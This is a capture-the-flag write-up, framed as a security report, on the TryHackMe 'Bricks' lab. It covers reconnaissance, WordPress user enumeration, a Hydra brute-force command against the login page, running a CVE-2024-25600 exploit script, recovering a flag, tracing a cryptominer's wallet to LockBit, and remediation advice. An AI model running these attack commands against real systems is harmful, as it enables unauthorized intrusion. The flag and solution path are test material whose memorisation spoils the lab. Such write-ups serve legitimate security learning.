Security Report: Vulnerability Analysis and Risks in the TryHack3m System

# Security Report: Vulnerability Analysis and Risks in the TryHack3m System #### 1. Storing the IP Address as a Domain: > nano /etc/hosts 10.10.78.255 bricks.thm *** #### 2. Port Scanning + Server and Version Detection A scan was performed using Nmap to detect open ports, servers, and their versions: > nmap -Pn -sV -sC bricks.thm Output: Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-13 02:56 GMT Nmap scan report for bricks.thm (10.10.239.153) Host is up (0.0056s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION **22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)** **80/tcp open http WebSockify Python/3.8.10** | fingerprint-strings: | GetRequest: | HTTP/1.1 405 Method Not Allowed | Server: WebSockify Python/3.8.10 | Date: Thu, 13 Feb 2025 02:56:49 GMT | Connection: close | Content-Type: text/html;charset=utf-8 |_http-server-header: WebSockify Python/3.8.10 **443/tcp open ssl/ssl Apache httpd (SSL-only mode)** **3306/tcp open mysql MySQL (unauthorized)** MAC Address: 02:96:56:FD:74:27 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 83.90 seconds. *** #### 3. Login Attempt and Information Retrieval from the Web Server: Attempt to access the HTTP server: http://bricks.thm/ Error code: 405 (Method Not Allowed). Attempt to access the HTTPS server: https://bricks.thm/ Warning: "Potential Security Risk Ahead" - The SSL certificate is invalid, but access is still possible. *** #### 4. Hidden Page Scanning Using Gobuster: > gobuster dir -u https://bricks.thm -w /usr/share/wordlists/dirb/common.txt -b 403,404 -k Output: =============================================================== > > Starting gobuster in directory enumeration mode > =============================================================== /0 (Status: 301) [Size: 0] [--> https://bricks.thm/0/] /admin (Status: 302) [Size: 0] [--> https://bricks.thm/wp-admin/] /atom (Status: 301) [Size: 0] [--> https://bricks.thm/feed/atom/] /b (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/] /B (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/] ... /robots.txt (Status: 200) [Size: 67] detection: The robots.txt file was found and includes a list of restricted pages for search engines. *** #### 5. Investigating Hidden Web Pages: https://bricks.thm/robots.txt: User-agent: * Disallow: /wp-admin/ Allow: /wp-admin/admin-ajax.php Note: admin-ajax.php does not provide additional information. #### https://bricks.thm/wp-login.php - Login page. *** #### 6. Login Attempts Using the WordPress API: Accessing usernames: > curl -s https://bricks.thm/wp-json/wp/v2/users | jq Output: 404 Not Found (Access is blocked). Accessing users through author: > curl -I https://bricks.thm/?author=1 Output: makefile Author: administrator *** #### 7. Brute Force Attack Attempt: Brute force attack using Hydra: > hydra -l administrator -P /root/Tools/wordlists/rockyou.txt -t 64 -S bricks.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:F=Error" Result: Failed to login! *** #### 8. Exploiting a System Vulnerability: Identifying the service provider and version to locate a vulnerability in the current page. Examining hidden links within the source view of pages, one of the links was: https://bricks.thm/comments/feed/ Upon accessing the link, a file was downloaded containing an HTML file with the following information: ### <generator> **https://wordpress.org/?v=6.5** </generator> A Google search revealed a vulnerability matching this service and version: #### CVE-2024-25600 Running the exploit: > python3 CVE-2024-25600.py -u https://bricks.thm/ Login successful! ***** ### Flag Discovery: #### 9. Attempting to Access the Hidden.txt File: Access attempt via URL: https://bricks.thm/hidden.txt Output: "Whoops, that page is gone". Accessing an encrypted file (650c844110baced87e1606453b93f22a.txt): Shell> cat 650c844110baced87e1606453b93f22a.txt THM{fl46_650c844110baced87e1606453b93f22a} 650c844110baced87e1606453b93f22a.txt contains the flag: ### THM{fl46_650c844110baced87e1606453b93f22a} *** #### 10. Detecting a Suspicious Process: Displaying active system services: > systemctl | grep running Output: ... ### ubuntu.service loaded active running TRYHACK3M - Suspicious process! *** #### 11. Identifying the Suspicious Activity: First, check the location of the suspicious service file: > systemctl status ubuntu.service Output: ubuntu.service - TRYHACK3M Loaded: loaded (/etc/systemd/system/ubuntu.service; enabled; vendor preset: enabled) Active: active (running) since Tue 2025-03-04 21:32:23 UTC; 2min 16s ago Main PID: 2669 (nm-inet-dialog) ... *** #### 12. Finding the Log File Recording the Attacker's Actions: Checking the directory where the suspicious service logs its actions: > ls /lib/NetworkManager/ Output: ... ### inet.conf -> Log file ... *** #### 13. Searching for the Wallet Address Used for Crypto Mining: Accessing the log file and searching for the address: > cat /lib/NetworkManager/inet.conf Output: ... #### Bitcoin wallet address obtained: ### bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa After searching "bc1" prefix on Google, it was confirmed as a cryptocurrency address. *** #### 14. Identifying the Attacking Group: After identifying the cryptocurrency wallet address, we continued searching for information about the wallet on digital currency platforms like Blockchain: #### Blockchain Explorer :(https://www.blockchain.com/explorer/search?search=bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa) We entered the address in the search bar and observed several large transactions made from this wallet. One of the addresses made multiple large transactions, and in the first link: ##### OFAC - United States Sanctions Affiliates of Russia-Based LockBit Ransomware Group Information appeared about the individual associated with the account address, "Ivan Gennadievich," and at the top of the page, the group LockBit was mentioned. ### The group name is : LockBit *** **** ### **Summary of Detected Vulnerabilities** During the assessment, several critical security vulnerabilities were identified that could allow attackers to exploit the system for malicious purposes. Below is a detailed description of the detected vulnerabilities, their risks, and their potential impact. --- ### **1. CVE-2024-25600** **What is the vulnerability?** This vulnerability relates to a flaw in specific software that could enable **Remote Code Execution (RCE)**, **Privilege Escalation**, or **Information Disclosure**. **Why is it dangerous?** - Allows an attacker to execute malicious code within the system without authorization. - Could lead to complete server takeover or exposure of sensitive data. - May be exploited for additional attacks, such as malware installation or data theft. **Potential impact:** - Disruption of critical services. - Compromise of user data and leakage of classified information. - Use of the server as a base for further attacks (Botnet). --- ### **2. Expired SSL Certificate** **What is the vulnerability?** When an SSL certificate expires or is invalid, communication between users and the server is not properly encrypted. **Why is it dangerous?** - Enables attackers to perform **Man-in-the-Middle (MITM)** attacks and intercept sensitive data. - Users may receive browser warnings, damaging the website's credibility. - Could lead to data breaches, including login credentials and financial information. **Potential impact:** - Leakage of user and payment information. - Loss of user and customer trust. - Business disruption due to blocked website access. --- ### **3. Digital Wallet Breach** **What is the vulnerability?** Attackers may exploit system or user-level weaknesses to **steal private keys** from digital wallets storing cryptocurrencies like Bitcoin and Ethereum. **Why is it dangerous?** - Allows an attacker to directly steal funds from the digital wallet. - No way to recover funds in case of theft. - These attacks are often conducted through phishing, malware, or system vulnerabilities. **Potential impact:** - Significant financial loss without recovery options. - Damage to customer trust in the service or platform. - Use of stolen wallets for criminal activities, such as money laundering. --- ### **4. Cryptojacking** **What is the vulnerability?** Attackers can exploit system resources (CPU/GPU) to mine cryptocurrency without the server owner's knowledge. **Why is it dangerous?** - Causes excessive hardware resource usage, potentially slowing down the system and affecting performance. - Can result in high electricity costs and overuse of system resources. - Exploits the system for an attacker's benefit without the server owner's consent. **Potential impact:** - Significant slowdown of services and potential server crashes. - Increased electricity consumption and operational costs. - Damage to server reliability and security. --- ## **Security Recommendations for the System/Server Owner** ### **1. System Updates and Security Patches** - Install the latest security updates, including patches for CVE-2024-25600. - Check for specific patches for vulnerable servers or applications. ### **2. SSL Certificate Renewal and Secure Communication** - Issue and install a **new, updated SSL certificate**. - Set up automatic renewal to prevent future issues. - Ensure all communication is encrypted using **TLS 1.2 or TLS 1.3**. ### **3. Securing Digital Wallets** - Use **hardware wallets** instead of only online wallets. - Enable **Two-Factor Authentication (2FA)** for all crypto-related accounts. - Avoid storing private keys in unsecured locations. ### **4. Detecting and Blocking Cryptojacking** - Monitor **unusual CPU/GPU resource usage**. - Implement firewall policies to block suspicious connections. - Use **IDS/IPS systems** to detect and block malicious code. ### **5. Strengthening Server Security** - Restrict server access to authorized users only. - Change default passwords and use strong, complex passwords. - Regularly review logs for suspicious activities. ### **6. Advanced Network Security** - Implement a **firewall** to block unauthorized traffic. - Use a **VPN** for remote access. - Conduct **regular penetration testing** to identify vulnerabilities. ### **7. Threat Monitoring and Management** - Install an **Intrusion Detection/Prevention System (IDS/IPS)** to monitor attackers. - Use **SIEM tools** to collect and analyze security logs. - Set up **security alerts** for suspicious access or system anomalies. --- ### **Conclusion** The identified vulnerabilities pose significant risks to the system and could lead to severe financial and operational damage. It is recommended to implement the suggested security measures as soon as possible to protect the server, data, and users from cyber threats.